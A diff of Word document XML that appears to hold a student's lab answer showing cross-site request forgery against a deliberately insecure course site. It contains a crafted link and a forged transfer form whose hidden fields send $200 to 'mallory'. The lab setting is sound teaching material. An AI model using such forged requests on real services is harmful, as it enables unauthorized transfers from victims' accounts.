+        <w:t xml:space="preserve">&lt;input type="hidden" name="to" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       value="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>mallory</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>&lt;input type="submit"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Site 2:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://andromeda.cs.virginia.edu/~insecure/csrf.php?csrf_token=123456789&amp;amount=200&amp;to=mallory</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;form action="https://andromeda.cs.virginia.edu/~insecure/csrf.php?token" name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>csrf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>" method="post"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;p&gt;Transfer </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;select name='amount'&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value='0'&gt;$0&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value='20'&gt;$20&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value='40'&gt;$40&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value='60'&gt;$60&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value='80'&gt;$80&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value='100'&gt;$100&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;/select&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    to</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;select name='to'&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;option value=''&gt;----- select one -----&lt;/option&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>&lt;option value='egoists'&gt;Egoists Anonymous&lt;/option&gt;&lt;option value='redundancy'&gt;The Society for Redundancy Society&lt;/option&gt;&lt;option value='yacht'&gt;The Help Me Fix My Yacht Kickstarter&lt;/option&gt;&lt;option value='vagueness'&gt;Vagueness or Something Association&lt;/option&gt;&lt;option value='apostrophe'&gt;Misplaced Apostrophe's Anonymous&lt;/option&gt;&lt;option value='mediocrity'&gt;International Mediocrity Foundation&lt;/option&gt;&lt;option value='utopia'&gt;Utopians For A Better Society&lt;/option&gt;&lt;option value='fame'&gt;Fame Seekers Anonymous&lt;/option&gt;&lt;option value='</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>codep</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>'&gt;Codependency Cooperative&lt;/option&gt;&lt;option value='moon'&gt;The Flat Moon Society&lt;/option&gt;    &lt;/select&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>&lt;/p&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>&lt;input type='hidden' name='</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>csrf_token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>' value='123456789'&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>&lt;input type="hidden" name="amount" value="200"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&lt;input type="hidden" name="to" </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       value="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>mallory</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t>&lt;input type="submit"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
     </w:p>
